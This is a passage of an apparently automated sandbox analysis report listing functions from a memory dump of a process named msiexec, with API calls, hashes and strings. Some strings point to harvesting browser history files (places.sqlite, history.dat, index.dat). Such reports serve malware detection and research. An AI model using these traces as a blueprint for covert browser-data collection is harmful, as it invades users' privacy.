                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                            Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                            • free.MSVCRT ref: 00418803
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                            • String ID:
                                                                            • API String ID: 1355100292-0
                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                            Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            • memset.MSVCRT ref: 00414C87
                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProcVersionmemsetwcscpy
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 4182280571-2036018995
                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                            Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                            • memset.MSVCRT ref: 00403A55
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                            • String ID: history.dat$places.sqlite
                                                                            • API String ID: 2641622041-467022611
                                                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                            Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$File$PointerRead
                                                                            • String ID:
                                                                            • API String ID: 839530781-0
                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                            Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID: *.*$index.dat
                                                                            • API String ID: 1974802433-2863569691
                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                            Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                            Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                            Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                            • String ID:
                                                                            • API String ID: 1125800050-0
                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                            Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep
                                                                            • String ID: }A
                                                                            • API String ID: 252777609-2138825249
                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                            Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.MSVCRT ref: 00409A10
                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                            • free.MSVCRT ref: 00409A31
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: freemallocmemcpy
                                                                            • String ID:
                                                                            • API String ID: 3056473165-0
                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                            Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d
                                                                            • API String ID: 0-2564639436
                                                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                            Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: BINARY
                                                                            • API String ID: 2221118986-907554435
                                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                            Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /stext
                                                                            • API String ID: 2081463915-3817206916
                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                            Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 2445788494-0
                                                                            • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                            • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                            Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3150196962-0
                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                            Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: malloc
                                                                            • String ID: failed to allocate %u bytes of memory
                                                                            • API String ID: 2803490479-1168259600
                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                            Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmpmemset
                                                                            • String ID:
                                                                            • API String ID: 1065087418-0
                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                            Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                            • String ID:
                                                                            • API String ID: 1381354015-0
                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                            Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004301AD
                                                                            • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1297977491-0
                                                                            • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                            • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                            • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                            • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                            Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                            Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                            • String ID:
                                                                            • API String ID: 2154303073-0
